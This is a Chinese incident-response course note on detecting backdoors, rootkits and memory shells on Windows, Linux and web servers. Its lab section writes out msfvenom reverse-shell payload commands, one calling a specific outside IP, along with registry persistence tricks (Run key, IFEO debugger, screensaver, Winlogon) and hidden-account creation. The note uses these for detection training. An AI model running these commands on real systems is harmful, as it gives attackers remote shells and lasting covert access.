知識(shí)點(diǎn)

#知識(shí)點(diǎn)
-網(wǎng)頁(yè)篡改與后門攻擊防范應(yīng)對(duì)指南
主要需了解：異常特征，處置流程，分析報(bào)告等
主要需了解：日志存儲(chǔ)，Webshell檢測(cè)，分析思路等
掌握：
中間件日志存儲(chǔ)，日志格式內(nèi)容介紹（IP,UA頭,訪問方法,請(qǐng)求文件,狀態(tài)碼等）
Webshell查殺（常規(guī)后門，內(nèi)存馬（單獨(dú)還有））
分析思路：基于時(shí)間，基于漏洞，基于后門篩選（還有）

#內(nèi)容點(diǎn)：
應(yīng)急響應(yīng)：
1、抗拒絕服務(wù)攻擊防范應(yīng)對(duì)指南
2、勒索軟件防范應(yīng)對(duì)指南
3、釣魚郵件攻擊防范應(yīng)對(duì)指南
4、網(wǎng)頁(yè)篡改與后門攻擊防范應(yīng)對(duì)指南
5、網(wǎng)絡(luò)安全漏洞防范應(yīng)對(duì)指南
6、大規(guī)模數(shù)據(jù)泄露防范應(yīng)對(duì)指南
7、僵尸網(wǎng)絡(luò)感染防范應(yīng)對(duì)指南
8、APT攻擊入侵防范應(yīng)對(duì)指南
9、各種輔助類分析工具項(xiàng)目使用
朔源反制：
威脅情報(bào)，信息庫(kù)追蹤，設(shè)備反制，IDS&IPS等反制，工具漏洞反制，蜜罐釣魚反制等

文章來源地址http://www.zghlxwxcb.cn/news/detail-541479.html

演示案例：

1、Windows-后門-常規(guī)&權(quán)限維持&內(nèi)存馬

2、Linux-后門-常規(guī)&權(quán)限維持&Rootkit&內(nèi)存馬

Windows實(shí)驗(yàn)
1、常規(guī)MSF后門-分析檢測(cè)
2、權(quán)限維持后門-分析檢測(cè)
3、Web程序內(nèi)存馬-分析檢測(cè)
常見工具集合：
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常規(guī)后門：
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自啟動(dòng)測(cè)試：
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
隱藏賬戶：
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
屏保&登錄
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"

Linux實(shí)驗(yàn)
1、常規(guī)MSF后門-分析檢測(cè)
2、Rootkit后門-分析檢測(cè)
3、權(quán)限維持后門-分析檢測(cè)
4、Web程序內(nèi)存馬-分析檢測(cè)
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常規(guī)后門：
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
Rootkit后門：GScan rkhunter 
權(quán)限維持后門：GScan rkhunter
1、GScan
https://github.com/grayddq/GScan
python GScan.py
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz 
cd rkhunter-1.4.6 
./installer.sh --layout default --install
rkhunter -c

Web層面：通用系統(tǒng)層面
1、常規(guī)后門
2、內(nèi)存馬（無文件馬）
    PHP
    .NET
    JAVA
    Python

總結(jié)

1、對(duì)于系統(tǒng)層面的后門：
1.1、windows
對(duì)于常規(guī)MSF后門，其一般會(huì)有網(wǎng)絡(luò)外連的情況，可使用火絨劍、PCHunter工具查看網(wǎng)絡(luò)，針對(duì)網(wǎng)絡(luò)外連的進(jìn)行逐一排查
對(duì)于權(quán)限維持后門，比如自啟動(dòng)、映像劫持，在火絨劍、PCHunter里也有對(duì)應(yīng)的欄目，也可逐一排查

1.2、linux
對(duì)于常規(guī)MSF后門，其一般會(huì)有網(wǎng)絡(luò)外連的情況，可使用命令：netstat -anpt  針對(duì)網(wǎng)絡(luò)外連的進(jìn)行逐一排查
對(duì)于Rootkit、權(quán)限維持后門，可使用工具GScan、rkhunter進(jìn)行排查

2、對(duì)于Web層面的后門：
2.1、普通Web后門
基于客戶反映的情況，我們拿到的信息可能是時(shí)間、漏洞，也可能什么也沒有。
如果有大概時(shí)間信息，那么可以通過時(shí)間篩選日志，看IP、請(qǐng)求地址、UA頭、響應(yīng)碼等定位攻擊，再鎖定該IP看有無其他行為
如果只知道框架信息，那么就根據(jù)框架可能存在的漏洞，復(fù)現(xiàn)一遍，查看新產(chǎn)生的日志拿到攻擊指紋信息，然后以此篩選日志，定位攻擊
如果沒有任何信息，那么先使用后門查殺工具鎖定后門，看哪個(gè)IP在訪問該后門，然后針對(duì)該IP篩選日志，定位攻擊

2.2、內(nèi)存馬
PHP內(nèi)存馬其實(shí)是進(jìn)程馬，只要把對(duì)應(yīng)進(jìn)程停掉，刪除后就沒了；Java內(nèi)存馬才是真正意義上的內(nèi)存馬
Java內(nèi)存馬根據(jù)不同的Java中間件有不同的實(shí)現(xiàn)方式，比如Tomcat的內(nèi)存馬主要有Servlet、Filter、Listener、Tomacat Valve
使用工具查殺Java內(nèi)存馬：
河馬的內(nèi)存馬查殺工具（優(yōu)點(diǎn)：適用多種中間件的內(nèi)存馬；缺點(diǎn)：易出Bug，不支持直接Dump或Kill）
腳本 tomcat-memshell-scanner.jsp（優(yōu)點(diǎn)：好用，支持直接Dump或Kill；缺點(diǎn)：只支持Tomcat的內(nèi)存馬）

到了這里，關(guān)于第163天：應(yīng)急響應(yīng)-后門攻擊檢測(cè)指南&Rookit&內(nèi)存馬&權(quán)限維持&WIN&Linux的文章就介紹完了。如果您還想了解更多內(nèi)容，請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！